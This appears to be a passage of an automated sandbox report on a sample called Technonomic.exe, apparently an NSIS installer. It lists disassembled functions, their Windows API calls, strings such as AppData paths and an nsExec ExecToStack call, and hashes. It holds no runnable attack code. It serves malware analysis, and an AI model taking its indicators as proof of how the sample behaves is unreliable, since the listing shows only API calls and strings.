DeleteFileW.KERNELBASE(?,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 0040599D
lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 004059E5
lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405A08
lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405A0E
FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405A1E
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,0000002E), ref: 00405ABE
FindClose.KERNEL32(00000000), ref: 00405ACD

Strings

\*.*, xrefs: 004059DF
"C:\Users\user\Desktop\Technonomic.exe", xrefs: 0040597D
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405A5E
PWB, xrefs: 004059CD

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Technonomic.exe"$Error writing temporary file. Make sure your temp folder is valid.$PWB$\*.*
API String ID: 2035342205-3697548252
Opcode ID: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
Instruction ID: d49c34b76256c1d29f4337415f4183e275b3e80d30968624801757685f99445f
Opcode Fuzzy Hash: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
Instruction Fuzzy Hash: E041B130A00A14EADB21AB618D89BAF7778DF41764F20427FF805B51D2D77C5982CE6E

Function 00406847 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
Instruction ID: 5555e847f210990d4306c473702a26b4278c0affe79ec1256b97cb42bd71170f
Opcode Fuzzy Hash: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
Instruction Fuzzy Hash: 60F17671D04229CBCF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7785A86CF45

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable, xrefs: 00402154

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable
API String ID: 542301482-550679374
Opcode ID: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
Instruction ID: 385f74efd5c92971cc76d3b11bce30356dc3a3525802f9592d77ec9fc6b050a7
Opcode Fuzzy Hash: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
Instruction Fuzzy Hash: E5412C75A00209AFCF00DFA4CD88AAD7BB5FF48314B20457AF915EB2D1DBB99A41CB54

Function 004064C6 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(76F93420,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0), ref: 004064D1
FindClose.KERNEL32(00000000), ref: 004064DD

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
Instruction ID: 6f39d47423a9e3911ec825e8889a8cd4e4dbe9a09c05077791626206cca478a1
Opcode Fuzzy Hash: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
Instruction Fuzzy Hash: FED012715151209BC2901B787F0C85B7A989F553317128E36F46AF22E0C738CC67869C

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
Instruction ID: f51a3655aa6281515c31db2bfa725e220f35cee11171475ca2a169fd8dd427bf
Opcode Fuzzy Hash: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
Instruction Fuzzy Hash: 09F05E716001149BC711EBA4DE49AAEB374EF04324F10057BE515E31E1D6B499459B2A

Function 00403D6F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DAB
ShowWindow.USER32(?), ref: 00403DC8
DestroyWindow.USER32 ref: 00403DDC
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF8
GetDlgItem.USER32(?,?), ref: 00403E19
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E2D
IsWindowEnabled.USER32(00000000), ref: 00403E34
GetDlgItem.USER32(?,00000001), ref: 00403EE2
GetDlgItem.USER32(?,00000002), ref: 00403EEC
SetClassLongW.USER32(?,000000F2,?), ref: 00403F06
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F57
GetDlgItem.USER32(?,00000003), ref: 00403FFD
ShowWindow.USER32(00000000,?), ref: 0040401E
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404030
EnableWindow.USER32(?,?), ref: 0040404B
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404061
EnableMenuItem.USER32(00000000), ref: 00404068
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404080
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404093
lstrlenW.KERNEL32(00423748,?,00423748,00429260), ref: 004040BC
SetWindowTextW.USER32(?,00423748), ref: 004040D0
ShowWindow.USER32(?,0000000A), ref: 00404204

Strings

H7B, xrefs: 004040A8

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: H7B
API String ID: 3282139019-2300413410
Opcode ID: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
Instruction ID: 25c141fc174ea51021f963d75397c5770897fb54822066ed0df1b6b59a0401a8
Opcode Fuzzy Hash: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
Instruction Fuzzy Hash: EFC1CFB1644200FBDB216F61EE84D2B7B78EB98745F40097EF641B51F0CB3998529B2E

Function 004039CC Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586

lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00403A4D
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76F93420), ref: 00403ACD
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403AE0
GetFileAttributesW.KERNEL32(: Completed), ref: 00403AEB
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\magmaet\clenched), ref: 00403B34

Part of subcall function 004060CA: wsprintfW.USER32 ref: 004060D7

RegisterClassW.USER32(00429200), ref: 00403B71
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B89
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BBE
ShowWindow.USER32(00000005,00000000), ref: 00403BF4
GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403C20
GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403C2D
RegisterClassW.USER32(00429200), ref: 00403C36
DialogBoxParamW.USER32(?,00000000,00403D6F,00000000), ref: 00403C55

Strings

.exe, xrefs: 00403ADA
RichEd32, xrefs: 00403C08
RichEd20, xrefs: 00403BFA
1033, xrefs: 004039EC, 00403A48
_Nb, xrefs: 00403B50, 00403BB8
C:\Users\user\AppData\Local\Temp\, xrefs: 004039D1
RichEdit, xrefs: 00403C27
: Completed, xrefs: 00403A94, 00403A9D, 00403AAB, 00403AFA, 00403B00
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00403A5C, 00403A64, 00403B07, 00403B0D, 00403B1D
RichEdit20W, xrefs: 00403C18, 00403C1E
H7B, xrefs: 004039F8
.DEFAULT\Control Panel\International, xrefs: 00403A38
"C:\Users\user\Desktop\Technonomic.exe", xrefs: 004039CF
Control Panel\Desktop\ResourceLocale, xrefs: 00403A00

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Technonomic.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2317402454
Opcode ID: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
Instruction ID: 56c0b88d72ef28cc24ab3b3da6b812fbe5e4610ed82a7e8ff487d4c0aa16eca4
Opcode Fuzzy Hash: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
Instruction Fuzzy Hash: E261C270240600BAD720AF66AD45F2B3A7CEB84B09F40447EF945B22E2DB7D69118A3D

Function 00402E41 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402E55
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Technonomic.exe,00000400), ref: 00402E71

Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\Technonomic.exe,80000000,00000003), ref: 00405D5C
Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Technonomic.exe,C:\Users\user\Desktop\Technonomic.exe,80000000,00000003), ref: 00402EBA
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403001

Strings

Error launching installer, xrefs: 00402E91
soft, xrefs: 00402F31
Inst, xrefs: 00402F28
"C:\Users\user\Desktop\Technonomic.exe", xrefs: 00402E4A
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040304A
C:\Users\user\Desktop\Technonomic.exe, xrefs: 00402E5B, 00402E6A, 00402E7E, 00402E9B
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403098
Null, xrefs: 00402F3A
C:\Users\user\AppData\Local\Temp\, xrefs: 00402E4B, 00403019
C:\Users\user\Desktop, xrefs: 00402E9C, 00402EA1, 00402EA7

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Technonomic.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Technonomic.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-317350955
Opcode ID: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
Instruction ID: 78d4ac72044dd1d4b64dcf5cb9e774c3474f7f20f7d9c099438d2fbc404b67ba
Opcode Fuzzy Hash: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
Instruction Fuzzy Hash: 6961E231900215AFDB209F75DD49B9E7AB8AB04359F20817FFA00B62C1CBB99A458B5D

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable,?,?,00000031), ref: 004017CD

Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

Strings

C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable, xrefs: 00401796
ExecToStack, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE
C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll, xrefs: 0040182D, 00401849
artikulationer\Udsorteringerne, xrefs: 00401819, 00401837

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll$C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable$ExecToStack$artikulationer\Udsorteringerne
API String ID: 1941528284-3521173550
Opcode ID: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
Instruction ID: 6fe11ac43b73c0a2a9a7664c997375d2890861868a1009608a3dd96d2534e176
Opcode Fuzzy Hash: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
Instruction Fuzzy Hash: B141B531900515BFCF10BBB5CC46DAE7679EF05328B20823BF422B51E1DB3C86529A6E

Function 004052E2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

Strings

Completed, xrefs: 00405303, 00405313, 00405319, 0040533C, 00405348

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
